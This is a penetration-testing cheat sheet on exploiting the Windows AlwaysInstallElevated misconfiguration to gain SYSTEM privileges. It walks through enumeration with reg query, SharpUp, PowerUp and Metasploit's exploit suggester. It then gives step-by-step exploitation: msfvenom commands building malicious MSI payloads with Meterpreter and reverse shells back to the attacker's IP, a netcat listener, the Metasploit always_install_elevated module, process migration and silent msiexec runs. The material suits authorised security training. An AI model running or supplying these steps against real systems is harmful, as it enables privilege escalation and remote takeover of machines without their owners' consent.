Always Installed Elevated exploitation
Target requirements
The target needs to have those values in the registry:
In
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
with the AlwaysInstallElevated set to 1In
Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
with the AlwaysInstallElevated set to 1 This means that installation packages are installed with elevated privileges
Enumerate with cmd
Type
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
in a cmd prompt should be set to 1
Exploitation
You should have a shell with covenant, metasploit or netcat or an access to the target. We will use Covenant and Metasploit here.
Covenant
Enumerate with SharpUp audit
In your shell type
SharpUp audit
In the results you should see this:
Enumerate with powerup
In the shell we will type PowerShellImport, type enter and fetch PoweUp.ps1 (if you do not have it you can get it here )
Click on execute
Type
powershell invoke-allchecks
in your shellWe should see this
Exploitation
generate a payload with msfvenom
msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi
between the quotes copy and paste an encoded launcher.Upload your file in the target using Upload command from covenant (type
Upload
and enter, file the file path for the target and browse to the file in your attack machine)run it using `shell msiexec /quiet /qn /i exploitalwaysinstalled.msi
We should get a prompt for another reverse shell in our grunts as an elevated user
Exploitation with powerup
powershell -ep bypass
. .\PowerUp.ps1
Write-UserAddMSI
It will set up a malicious MSI called
UserAdd
Metasploit
Interact with a session you should already have from initial foothold
sessions -i num-of-session
Enumerate
Launch
run post/multi/recon/local_exploit_suggester
You should see:
- exploit/windows/local/always_install_elevated: The target is vulnerable.
Exploitation
Background your session with ctrl z
Type
use exploit/windows/local/always_install_elevated
set session to the number of the session you have on your target
type
exploit -j
list the sessions you should have another one running as authority system
type ps and look for a process under session 1 so that we can migrate to it
We can use winlogon.exe
620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
Migrate to it using
migrate PID-number
in our example it is going to bemigrate 520
OR
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost your-Kali-IP
run
In another console tab
msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi
Get the generated msi in your target (python server -> browser from target)
In your target Place
setup.msi
in a folder where you have write accessOpen command prompt and type:
msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi
Other way
Generate a malicious MSI package
msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi
Set up a listener
rlwrap nc -lnvp CHOSEN-PORT
Upload it to the target and execute it from the cmd
msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart
You should get an elevated shell
Resources
Last updated